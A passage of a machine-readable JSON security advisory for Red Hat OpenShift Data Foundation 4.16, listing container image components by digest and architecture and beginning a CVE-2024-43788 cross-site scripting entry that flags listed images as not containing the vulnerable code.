"product_reference": "odf4/odf-operator-bundle@sha256:e5c49afe79002be166f7b51421d712069ad6fe67c54743c8a991afd97f9f30f6_amd64",
"relates_to_product_reference": "9Base-RHODF-4.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odf-prometheus-operator-bundle@sha256:5ddcb5b3ff0a69c80857e5185dcfd9e397ba0ad1272e66cd98acd729996d006a_amd64 as a component of RHODF 4.16 for RHEL 9",
"product_id": "9Base-RHODF-4.16:odf4/odf-prometheus-operator-bundle@sha256:5ddcb5b3ff0a69c80857e5185dcfd9e397ba0ad1272e66cd98acd729996d006a_amd64"
},
"product_reference": "odf4/odf-prometheus-operator-bundle@sha256:5ddcb5b3ff0a69c80857e5185dcfd9e397ba0ad1272e66cd98acd729996d006a_amd64",
"relates_to_product_reference": "9Base-RHODF-4.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odf-prometheus-operator-bundle@sha256:a91d41a5bfcf9b7fcd4504c59dd3d44be644ef5dea929d1b4dcb26fffec4f45c_s390x as a component of RHODF 4.16 for RHEL 9",
"product_id": "9Base-RHODF-4.16:odf4/odf-prometheus-operator-bundle@sha256:a91d41a5bfcf9b7fcd4504c59dd3d44be644ef5dea929d1b4dcb26fffec4f45c_s390x"
},
"product_reference": "odf4/odf-prometheus-operator-bundle@sha256:a91d41a5bfcf9b7fcd4504c59dd3d44be644ef5dea929d1b4dcb26fffec4f45c_s390x",
"relates_to_product_reference": "9Base-RHODF-4.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odf-prometheus-operator-bundle@sha256:d721cfdfdb09d95432ca808a491618af38cd600d96a6157fdf0f00bf6ce616d1_ppc64le as a component of RHODF 4.16 for RHEL 9",
"product_id": "9Base-RHODF-4.16:odf4/odf-prometheus-operator-bundle@sha256:d721cfdfdb09d95432ca808a491618af38cd600d96a6157fdf0f00bf6ce616d1_ppc64le"
},
"product_reference": "odf4/odf-prometheus-operator-bundle@sha256:d721cfdfdb09d95432ca808a491618af38cd600d96a6157fdf0f00bf6ce616d1_ppc64le",
"relates_to_product_reference": "9Base-RHODF-4.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odf-rhel9-operator@sha256:28a47c19fadade32960712e3e23c21ef79369c045d2016f00564a9291b483dfd_amd64 as a component of RHODF 4.16 for RHEL 9",
"product_id": "9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:28a47c19fadade32960712e3e23c21ef79369c045d2016f00564a9291b483dfd_amd64"
},
"product_reference": "odf4/odf-rhel9-operator@sha256:28a47c19fadade32960712e3e23c21ef79369c045d2016f00564a9291b483dfd_amd64",
"relates_to_product_reference": "9Base-RHODF-4.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odf-rhel9-operator@sha256:6cef9e6774596153f83743a8cfa1919e8eee26c19145e5cf36c3adf6a4f58d6b_arm64 as a component of RHODF 4.16 for RHEL 9",
"product_id": "9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:6cef9e6774596153f83743a8cfa1919e8eee26c19145e5cf36c3adf6a4f58d6b_arm64"
},
"product_reference": "odf4/odf-rhel9-operator@sha256:6cef9e6774596153f83743a8cfa1919e8eee26c19145e5cf36c3adf6a4f58d6b_arm64",
"relates_to_product_reference": "9Base-RHODF-4.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odf-rhel9-operator@sha256:71683f56cbcf5378086924b7c4f3666815d30463b74f801df0fa9f6781a421ea_ppc64le as a component of RHODF 4.16 for RHEL 9",
"product_id": "9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:71683f56cbcf5378086924b7c4f3666815d30463b74f801df0fa9f6781a421ea_ppc64le"
},
"product_reference": "odf4/odf-rhel9-operator@sha256:71683f56cbcf5378086924b7c4f3666815d30463b74f801df0fa9f6781a421ea_ppc64le",
"relates_to_product_reference": "9Base-RHODF-4.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odf-rhel9-operator@sha256:8a812868150ffa298110bf81d30ae3aecf152003ed64f927f1416e36cc0e579d_s390x as a component of RHODF 4.16 for RHEL 9",
"product_id": "9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:8a812868150ffa298110bf81d30ae3aecf152003ed64f927f1416e36cc0e579d_s390x"
},
"product_reference": "odf4/odf-rhel9-operator@sha256:8a812868150ffa298110bf81d30ae3aecf152003ed64f927f1416e36cc0e579d_s390x",
"relates_to_product_reference": "9Base-RHODF-4.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odr-cluster-operator-bundle@sha256:1777e37400e5e8d736bbeec8a0123b573eb77b416460322c082c25f711b6af0d_amd64 as a component of RHODF 4.16 for RHEL 9",
"product_id": "9Base-RHODF-4.16:odf4/odr-cluster-operator-bundle@sha256:1777e37400e5e8d736bbeec8a0123b573eb77b416460322c082c25f711b6af0d_amd64"
},
"product_reference": "odf4/odr-cluster-operator-bundle@sha256:1777e37400e5e8d736bbeec8a0123b573eb77b416460322c082c25f711b6af0d_amd64",
"relates_to_product_reference": "9Base-RHODF-4.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odr-cluster-operator-bundle@sha256:3a20e65f8638501afd7c8580c72fed84dd1629e59e019303a0edd3e0ce89c203_ppc64le as a component of RHODF 4.16 for RHEL 9",
"product_id": "9Base-RHODF-4.16:odf4/odr-cluster-operator-bundle@sha256:3a20e65f8638501afd7c8580c72fed84dd1629e59e019303a0edd3e0ce89c203_ppc64le"
},
"product_reference": "odf4/odr-cluster-operator-bundle@sha256:3a20e65f8638501afd7c8580c72fed84dd1629e59e019303a0edd3e0ce89c203_ppc64le",
"relates_to_product_reference": "9Base-RHODF-4.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odr-cluster-operator-bundle@sha256:a49df6e9be0a6554622abc1d01ed872271b89cc97c802cb8c90bd969943d31f9_s390x as a component of RHODF 4.16 for RHEL 9",
"product_id": "9Base-RHODF-4.16:odf4/odr-cluster-operator-bundle@sha256:a49df6e9be0a6554622abc1d01ed872271b89cc97c802cb8c90bd969943d31f9_s390x"
},
"product_reference": "odf4/odr-cluster-operator-bundle@sha256:a49df6e9be0a6554622abc1d01ed872271b89cc97c802cb8c90bd969943d31f9_s390x",
"relates_to_product_reference": "9Base-RHODF-4.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odr-hub-operator-bundle@sha256:3f018797c5507d4404ba92363f714ce948e095920fe9ddfcee447ef86a51823a_ppc64le as a component of RHODF 4.16 for RHEL 9",
"product_id": "9Base-RHODF-4.16:odf4/odr-hub-operator-bundle@sha256:3f018797c5507d4404ba92363f714ce948e095920fe9ddfcee447ef86a51823a_ppc64le"
},
"product_reference": "odf4/odr-hub-operator-bundle@sha256:3f018797c5507d4404ba92363f714ce948e095920fe9ddfcee447ef86a51823a_ppc64le",
"relates_to_product_reference": "9Base-RHODF-4.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odr-hub-operator-bundle@sha256:c94c1be03b3bb6b62c233102048cc34f051c7b23de2cb6548869df4db6646996_amd64 as a component of RHODF 4.16 for RHEL 9",
"product_id": "9Base-RHODF-4.16:odf4/odr-hub-operator-bundle@sha256:c94c1be03b3bb6b62c233102048cc34f051c7b23de2cb6548869df4db6646996_amd64"
},
"product_reference": "odf4/odr-hub-operator-bundle@sha256:c94c1be03b3bb6b62c233102048cc34f051c7b23de2cb6548869df4db6646996_amd64",
"relates_to_product_reference": "9Base-RHODF-4.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odr-hub-operator-bundle@sha256:f20e6ba21e4ad8e7d66b8de3b7f4d5f5580ef414c55134a28c1c025da365b3b0_s390x as a component of RHODF 4.16 for RHEL 9",
"product_id": "9Base-RHODF-4.16:odf4/odr-hub-operator-bundle@sha256:f20e6ba21e4ad8e7d66b8de3b7f4d5f5580ef414c55134a28c1c025da365b3b0_s390x"
},
"product_reference": "odf4/odr-hub-operator-bundle@sha256:f20e6ba21e4ad8e7d66b8de3b7f4d5f5580ef414c55134a28c1c025da365b3b0_s390x",
"relates_to_product_reference": "9Base-RHODF-4.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odr-recipe-operator-bundle@sha256:3132999b2b34ff74ede22b057de9005714c91e2d31d3727924ea0960dc5b8231_ppc64le as a component of RHODF 4.16 for RHEL 9",
"product_id": "9Base-RHODF-4.16:odf4/odr-recipe-operator-bundle@sha256:3132999b2b34ff74ede22b057de9005714c91e2d31d3727924ea0960dc5b8231_ppc64le"
},
"product_reference": "odf4/odr-recipe-operator-bundle@sha256:3132999b2b34ff74ede22b057de9005714c91e2d31d3727924ea0960dc5b8231_ppc64le",
"relates_to_product_reference": "9Base-RHODF-4.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odr-recipe-operator-bundle@sha256:8d320cc20359f8d44957a72cfb80f98f228506fbb9b9318cddd64a3120166356_s390x as a component of RHODF 4.16 for RHEL 9",
"product_id": "9Base-RHODF-4.16:odf4/odr-recipe-operator-bundle@sha256:8d320cc20359f8d44957a72cfb80f98f228506fbb9b9318cddd64a3120166356_s390x"
},
"product_reference": "odf4/odr-recipe-operator-bundle@sha256:8d320cc20359f8d44957a72cfb80f98f228506fbb9b9318cddd64a3120166356_s390x",
"relates_to_product_reference": "9Base-RHODF-4.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odr-recipe-operator-bundle@sha256:f221b43415c44080b49785f4a35447dc529e0d27c17a76057df6b80992ac5388_amd64 as a component of RHODF 4.16 for RHEL 9",
"product_id": "9Base-RHODF-4.16:odf4/odr-recipe-operator-bundle@sha256:f221b43415c44080b49785f4a35447dc529e0d27c17a76057df6b80992ac5388_amd64"
},
"product_reference": "odf4/odr-recipe-operator-bundle@sha256:f221b43415c44080b49785f4a35447dc529e0d27c17a76057df6b80992ac5388_amd64",
"relates_to_product_reference": "9Base-RHODF-4.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odr-rhel9-operator@sha256:570760ed13629409e8533a91823f1c0b1f331d97590b1a47b0b15f4b35793ceb_arm64 as a component of RHODF 4.16 for RHEL 9",
"product_id": "9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:570760ed13629409e8533a91823f1c0b1f331d97590b1a47b0b15f4b35793ceb_arm64"
},
"product_reference": "odf4/odr-rhel9-operator@sha256:570760ed13629409e8533a91823f1c0b1f331d97590b1a47b0b15f4b35793ceb_arm64",
"relates_to_product_reference": "9Base-RHODF-4.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odr-rhel9-operator@sha256:742bf306d06ae5ed557c629ca4be3b5ae24a0f4dff37d7da106d4f112066f26e_ppc64le as a component of RHODF 4.16 for RHEL 9",
"product_id": "9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:742bf306d06ae5ed557c629ca4be3b5ae24a0f4dff37d7da106d4f112066f26e_ppc64le"
},
"product_reference": "odf4/odr-rhel9-operator@sha256:742bf306d06ae5ed557c629ca4be3b5ae24a0f4dff37d7da106d4f112066f26e_ppc64le",
"relates_to_product_reference": "9Base-RHODF-4.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odr-rhel9-operator@sha256:9b57ab1ec3d520d8c8fbc3584cd833b2262b6fa949c3b84cbbc43b899f0314e5_s390x as a component of RHODF 4.16 for RHEL 9",
"product_id": "9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:9b57ab1ec3d520d8c8fbc3584cd833b2262b6fa949c3b84cbbc43b899f0314e5_s390x"
},
"product_reference": "odf4/odr-rhel9-operator@sha256:9b57ab1ec3d520d8c8fbc3584cd833b2262b6fa949c3b84cbbc43b899f0314e5_s390x",
"relates_to_product_reference": "9Base-RHODF-4.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odr-rhel9-operator@sha256:b67afc5228f117432c8428782f72faf2b9b6ae1ae352aca9e0055a2ff9006d26_amd64 as a component of RHODF 4.16 for RHEL 9",
"product_id": "9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:b67afc5228f117432c8428782f72faf2b9b6ae1ae352aca9e0055a2ff9006d26_amd64"
},
"product_reference": "odf4/odr-rhel9-operator@sha256:b67afc5228f117432c8428782f72faf2b9b6ae1ae352aca9e0055a2ff9006d26_amd64",
"relates_to_product_reference": "9Base-RHODF-4.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/rook-ceph-operator-bundle@sha256:0843c3f61fa90cfafde569816b59ff0c8e5e69663cd9d58832204d074a2fcfc6_ppc64le as a component of RHODF 4.16 for RHEL 9",
"product_id": "9Base-RHODF-4.16:odf4/rook-ceph-operator-bundle@sha256:0843c3f61fa90cfafde569816b59ff0c8e5e69663cd9d58832204d074a2fcfc6_ppc64le"
},
"product_reference": "odf4/rook-ceph-operator-bundle@sha256:0843c3f61fa90cfafde569816b59ff0c8e5e69663cd9d58832204d074a2fcfc6_ppc64le",
"relates_to_product_reference": "9Base-RHODF-4.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/rook-ceph-operator-bundle@sha256:3d6a235a8365186279b13335bbd6705efeac2fcd4211acd79df2b62de701479a_s390x as a component of RHODF 4.16 for RHEL 9",
"product_id": "9Base-RHODF-4.16:odf4/rook-ceph-operator-bundle@sha256:3d6a235a8365186279b13335bbd6705efeac2fcd4211acd79df2b62de701479a_s390x"
},
"product_reference": "odf4/rook-ceph-operator-bundle@sha256:3d6a235a8365186279b13335bbd6705efeac2fcd4211acd79df2b62de701479a_s390x",
"relates_to_product_reference": "9Base-RHODF-4.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/rook-ceph-operator-bundle@sha256:d97b31272d77f0b0552844cc58749b772d71bef73d40bd2bf7befdad86d139e4_amd64 as a component of RHODF 4.16 for RHEL 9",
"product_id": "9Base-RHODF-4.16:odf4/rook-ceph-operator-bundle@sha256:d97b31272d77f0b0552844cc58749b772d71bef73d40bd2bf7befdad86d139e4_amd64"
},
"product_reference": "odf4/rook-ceph-operator-bundle@sha256:d97b31272d77f0b0552844cc58749b772d71bef73d40bd2bf7befdad86d139e4_amd64",
"relates_to_product_reference": "9Base-RHODF-4.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/rook-ceph-rhel9-operator@sha256:0a59997f6099bd93380e06a044122c51b8ffd9c269460cb3bb5541cde795cec2_ppc64le as a component of RHODF 4.16 for RHEL 9",
"product_id": "9Base-RHODF-4.16:odf4/rook-ceph-rhel9-operator@sha256:0a59997f6099bd93380e06a044122c51b8ffd9c269460cb3bb5541cde795cec2_ppc64le"
},
"product_reference": "odf4/rook-ceph-rhel9-operator@sha256:0a59997f6099bd93380e06a044122c51b8ffd9c269460cb3bb5541cde795cec2_ppc64le",
"relates_to_product_reference": "9Base-RHODF-4.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/rook-ceph-rhel9-operator@sha256:1530173486535fd574caae9d8e537701ac4d1782ed08248129041ad9ada52b20_amd64 as a component of RHODF 4.16 for RHEL 9",
"product_id": "9Base-RHODF-4.16:odf4/rook-ceph-rhel9-operator@sha256:1530173486535fd574caae9d8e537701ac4d1782ed08248129041ad9ada52b20_amd64"
},
"product_reference": "odf4/rook-ceph-rhel9-operator@sha256:1530173486535fd574caae9d8e537701ac4d1782ed08248129041ad9ada52b20_amd64",
"relates_to_product_reference": "9Base-RHODF-4.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/rook-ceph-rhel9-operator@sha256:b91c27e3cc9b1b35eaeac17e8b34da3cf0450584105a08f2cf3406c5ed41d7aa_s390x as a component of RHODF 4.16 for RHEL 9",
"product_id": "9Base-RHODF-4.16:odf4/rook-ceph-rhel9-operator@sha256:b91c27e3cc9b1b35eaeac17e8b34da3cf0450584105a08f2cf3406c5ed41d7aa_s390x"
},
"product_reference": "odf4/rook-ceph-rhel9-operator@sha256:b91c27e3cc9b1b35eaeac17e8b34da3cf0450584105a08f2cf3406c5ed41d7aa_s390x",
"relates_to_product_reference": "9Base-RHODF-4.16"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2024-43788",
"cwe": {
"id": "CWE-79",
"name": "Improper Neutralization of Input During Web Page Generation (\u0027Cross-site Scripting\u0027)"
},
"discovery_date": "2024-08-27T17:20:06.890123+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"9Base-RHODF-4.16:odf4/cephcsi-rhel9@sha256:2607716e0f81e3bd7b1142bb659e7e014281df7af15ae1902c119785f109873d_ppc64le",
"9Base-RHODF-4.16:odf4/cephcsi-rhel9@sha256:6312b4e4365530b398d34769da34113b156ff407d0189d2b909c2b27a5b344c5_amd64",
"9Base-RHODF-4.16:odf4/cephcsi-rhel9@sha256:7bffeec5f90000df7742e44dea55694e966fa0b35f5895aac0a1163bbce6573c_s390x",
"9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:5677389d91ef1e73da79a495d18bb47a94ecbe541395d8e2912595d5409841d2_ppc64le",
"9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:64f6ce88210656474cacf611b1e54eeb88be36f0e0e919719fa55ba3ec5a8bd3_s390x",
"9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:9eb29e92f64fb85151d6fced24d3b97ecd73df25d00d9c27bc43b08c41c48b55_amd64",
"9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:b06359b7d2322e5b95cc23a13b6c7fe1fdabe19b4623117b1525ac3f2a211c8e_arm64",
"9Base-RHODF-4.16:odf4/mcg-operator-bundle@sha256:1932ade33bd22b30845c64d083fc649807c0a63668ced57998eb2e623e6b487b_s390x",
"9Base-RHODF-4.16:odf4/mcg-operator-bundle@sha256:5dc780b845bf22a5ed8350a0c8783d1fb8a0fef4ce2e1c3265db82fd236ea3e1_amd64",
"9Base-RHODF-4.16:odf4/mcg-operator-bundle@sha256:e966bb50e83675453833e88fdc4a384f429d96a8430ad6849972fbc15c0f8313_ppc64le",
"9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:0e0a5877546c28076ad99cc22e560d6c952959c142e269fa83d866d5fff95e87_amd64",
"9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:7e44ee05c11d6ff10a07a59484ddc004eb9ba0acc5ff1f6b54d37912e4f7daf2_ppc64le",
"9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:b1580bce974d3d6768f9f091b0d9ccc24756ab493ccc46a253a48af5e08db5e2_arm64",
"9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:d87027dd4c0573b4f2eda78a8d3a53ef0862569d5ab8be3d6abd4a7cc8bc9f8d_s390x",
"9Base-RHODF-4.16:odf4/ocs-client-console-rhel9@sha256:4213b28df164ae81f6d9698f4efe2569501668cbce2fe8214c19cc540a0c2141_s390x",
"9Base-RHODF-4.16:odf4/ocs-client-console-rhel9@sha256:aedb8552fc5969cfa7bc090add6421848a91b06f4ef94a1922c2365bd69a8559_ppc64le",
"9Base-RHODF-4.16:odf4/ocs-client-console-rhel9@sha256:bf828ca2293ac3be275613872212e56049880a2a8ad6c8f1bb5bb66187d8e085_amd64",
"9Base-RHODF-4.16:odf4/ocs-client-operator-bundle@sha256:123523041fe4092a36fd41cc6203802d903188642bde1a40f22515a5715fff81_amd64",
"9Base-RHODF-4.16:odf4/ocs-client-operator-bundle@sha256:9e60966e93cc650b970b128498c02ede3df259be1736f3feb502768745d94c0a_s390x",
"9Base-RHODF-4.16:odf4/ocs-client-operator-bundle@sha256:f4bb37b39c1325a3964753b1fa8bac4b9303f9031f367f004430251377361eb4_ppc64le",
"9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:30add37f7ed1f17b871669c8ffd2a800ad2a17fdd805240bf96f247507703047_ppc64le",
"9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:9838494b592782f0ba76f7a6c35f0038c0cb8853f6fff4ee9f7001a9888be5e7_amd64",
"9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:eb2954eba23c0e2763e96c65eea09d3b1b482d3462cc5486b37f0f963f7344a8_s390x",
"9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:fd7885c63cf3088c6704f0fccdf36e0ba26ef588854ec9eb59047f51da35f3f8_arm64",
"9Base-RHODF-4.16:odf4/ocs-metrics-exporter-rhel9@sha256:50c5c58e1e065bc03b7e71116a48ee39080539c4b81b8ef0b9899454385f60cb_ppc64le",
"9Base-RHODF-4.16:odf4/ocs-metrics-exporter-rhel9@sha256:548a850169f3a90b5ee62e175aeb9c6d6fb24d2980d55fc86e0ab7eafef9f825_s390x",
"9Base-RHODF-4.16:odf4/ocs-metrics-exporter-rhel9@sha256:6b0b554925b945370aeb786e45f7f8676f8760c572df03153b8682bd42e8d477_amd64",
"9Base-RHODF-4.16:odf4/ocs-operator-bundle@sha256:1bbc151acb46edd4c042acd66d028eaa6b514204ad79c8be708d89f07c9f9e81_amd64",
"9Base-RHODF-4.16:odf4/ocs-operator-bundle@sha256:8b1349f42b72eff94f35195729cb6f3f93a3c80def65581222e6ab571d0e4bf1_s390x",
"9Base-RHODF-4.16:odf4/ocs-operator-bundle@sha256:f4956bd8ff8abed1fd909c77323ba62300e3a10080ebf45e295960ee9b13849c_ppc64le",
"9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:4c40801e077d40dfeeb97b835f67e5e2868d9b867f062fd4fc6e98a34021ca1e_ppc64le",
"9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:53da012c5fc8003c4d17008ba532c281c5f293d6933172119085b68088ccec7f_arm64",
"9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:6349fb76ed7d1b83ecddbadeb2325408eed283d02b12285f534407aea557362c_amd64",
"9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:ea010d2fcf217dce8fe5aa185a43ec8e8fa4f3d640d479ad2ea940b4848cdd13_s390x",
"9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:24dae6fe61af34d27e5fbed98f25dcfd0fe682703d4701c0047a123208012121_arm64",
"9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:338239cef29603d7cbc880655d11e9a370e79570930cb7e28ed388e386045d1c_s390x",
"9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:33d6b3c313d90a89e662516e96fb590cc12b101f6f481acbd1837fe3fb15e2fc_amd64",
"9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:461d71b5b8ba5fc5d791f8a49e8cb996660591c2c5d4828a696b995f1556b9ac_ppc64le",
"9Base-RHODF-4.16:odf4/odf-cosi-sidecar-rhel9@sha256:12b532399f68a08e3cc526b49773c267ccf6d703a7b891e6a2b5ed8e43173b30_s390x",
"9Base-RHODF-4.16:odf4/odf-cosi-sidecar-rhel9@sha256:298866526088d05769c5e784b62c9681c1ef0315f8977a433e725f3aeb5e7920_ppc64le",
"9Base-RHODF-4.16:odf4/odf-cosi-sidecar-rhel9@sha256:4ba8eb0bf46dad3c65c61882d92fa54de452dcdf642bd40504cd8bbd4494558f_amd64",
"9Base-RHODF-4.16:odf4/odf-csi-addons-operator-bundle@sha256:55a0efdb08e6e261983905fee0867bffdb82ae48495b074e527ad26729192ab9_ppc64le",
"9Base-RHODF-4.16:odf4/odf-csi-addons-operator-bundle@sha256:8721c6de61a7ee31e1312856e5887a36be7b1ce930fcba24b720097d286be6f6_amd64",
"9Base-RHODF-4.16:odf4/odf-csi-addons-operator-bundle@sha256:b8cc383dca903d2e229772937306456bde2b80ea3200ba354789a232fde825c9_s390x",
"9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:1487325c0aabb062ce9dfe7f2b3a7b3ba03b42231455406b1f3818bda124a6e9_amd64",
"9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:383a579a19c10dda694f373cd772b894e59791a36f4258b2cfb001968367e9c0_arm64",
"9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:4005df877f43b05aaa7f63a77fa8ad29b980121fbb3eb97c4470c8744abb7a11_s390x",
"9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:6bcf351b998ef81fe66340e2bc27398165be0b6aafcf51233e772a4cdb02618c_ppc64le",
"9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:2afcef0a34152e6828d79f4894d0da0badf275075e7bc1a91d1ab85f105a6a2d_ppc64le",
"9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:3507841b2f0757a42fed5ba0e6e94a029ce924d98e085cc384798c2b37c019fe_amd64",
"9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:60b5a727c734903f0b1021b4a90c5bbfae5ca65fe0d51ec17399d47635289235_arm64",
"9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:9c9bbf026f4fcf7da90729b2c49850d16bb2b48997c68782117ef495c99b57ce_s390x",
"9Base-RHODF-4.16:odf4/odf-multicluster-console-rhel9@sha256:30fcd0f6e1fbb29456163e00a8c5c6c90d9c0dc27b0435a50cb42d20f52e686f_amd64",
"9Base-RHODF-4.16:odf4/odf-multicluster-console-rhel9@sha256:4000cc38f48546a17f728a2328871d3deda6015742f5a11587207ecf84225460_s390x",
"9Base-RHODF-4.16:odf4/odf-multicluster-console-rhel9@sha256:de35a74ddbe766c84298d5347cdffe7fbf4a571028ae236cf0d70d409869c9f6_ppc64le",
"9Base-RHODF-4.16:odf4/odf-multicluster-operator-bundle@sha256:26dc5caa38dc2e1d61d66820be14e991fee386d17f5405e801ab6141e317df64_amd64",
"9Base-RHODF-4.16:odf4/odf-multicluster-operator-bundle@sha256:4c13e76ea87a06a890fa71c6ed5b6998dc9999da1dcf230c9a0b6a333ff0e3e5_ppc64le",
"9Base-RHODF-4.16:odf4/odf-multicluster-operator-bundle@sha256:dc943e771dfb8b180c13b84a0a2aebb9f9e01d720aa89f492ee8c120dd7af372_s390x",
"9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:1b710bc135bc32558182995a18978ebf0a7c4509de1053db05db9a969343caf6_ppc64le",
"9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:6f7cb7c3f4a5957c44972644b980d5f83beda026a48c97315b7a47b698f24e37_s390x",
"9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:821a6dfb261e2736fd0a7728d50acbdbd6c74317034724571026c5e1ac150ec8_arm64",
"9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:f056fae131175a4e179ad3f267f44562eec169383d382c67398eb5d3d74ab50a_amd64",
"9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:00a38f702a6b771ff58392e323c52d3be66ec43d61a1b2c3a8664f92b6698ae3_amd64",
"9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:a0481ef7d603bbd4194d725bcd91992122ecc399460bf3c215de73ffc012e68a_ppc64le",
"9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:a42e96f4758df3fc79cbd67b67b41ed2ef53db904395d8b08cbe5cd3f8e4ecb4_s390x",
"9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:e02a85818cb748b65fa29ba689b9240bc181087a50d96418499f0b7f3aa82f57_arm64",
"9Base-RHODF-4.16:odf4/odf-operator-bundle@sha256:715f53af949614a8a72252a19edbe9eb84c53ac8434da6b32366039046e679e5_s390x",
"9Base-RHODF-4.16:odf4/odf-operator-bundle@sha256:d56279132a543dca6c625f79ce118ee36b59ea6000cf5a895cda79c856eb1de1_ppc64le",
"9Base-RHODF-4.16:odf4/odf-operator-bundle@sha256:e5c49afe79002be166f7b51421d712069ad6fe67c54743c8a991afd97f9f30f6_amd64",
"9Base-RHODF-4.16:odf4/odf-prometheus-operator-bundle@sha256:5ddcb5b3ff0a69c80857e5185dcfd9e397ba0ad1272e66cd98acd729996d006a_amd64",
"9Base-RHODF-4.16:odf4/odf-prometheus-operator-bundle@sha256:a91d41a5bfcf9b7fcd4504c59dd3d44be644ef5dea929d1b4dcb26fffec4f45c_s390x",
"9Base-RHODF-4.16:odf4/odf-prometheus-operator-bundle@sha256:d721cfdfdb09d95432ca808a491618af38cd600d96a6157fdf0f00bf6ce616d1_ppc64le",
"9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:28a47c19fadade32960712e3e23c21ef79369c045d2016f00564a9291b483dfd_amd64",
"9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:6cef9e6774596153f83743a8cfa1919e8eee26c19145e5cf36c3adf6a4f58d6b_arm64",
"9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:71683f56cbcf5378086924b7c4f3666815d30463b74f801df0fa9f6781a421ea_ppc64le",
"9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:8a812868150ffa298110bf81d30ae3aecf152003ed64f927f1416e36cc0e579d_s390x",
"9Base-RHODF-4.16:odf4/odr-cluster-operator-bundle@sha256:1777e37400e5e8d736bbeec8a0123b573eb77b416460322c082c25f711b6af0d_amd64",
"9Base-RHODF-4.16:odf4/odr-cluster-operator-bundle@sha256:3a20e65f8638501afd7c8580c72fed84dd1629e59e019303a0edd3e0ce89c203_ppc64le",
"9Base-RHODF-4.16:odf4/odr-cluster-operator-bundle@sha256:a49df6e9be0a6554622abc1d01ed872271b89cc97c802cb8c90bd969943d31f9_s390x",
"9Base-RHODF-4.16:odf4/odr-hub-operator-bundle@sha256:3f018797c5507d4404ba92363f714ce948e095920fe9ddfcee447ef86a51823a_ppc64le",
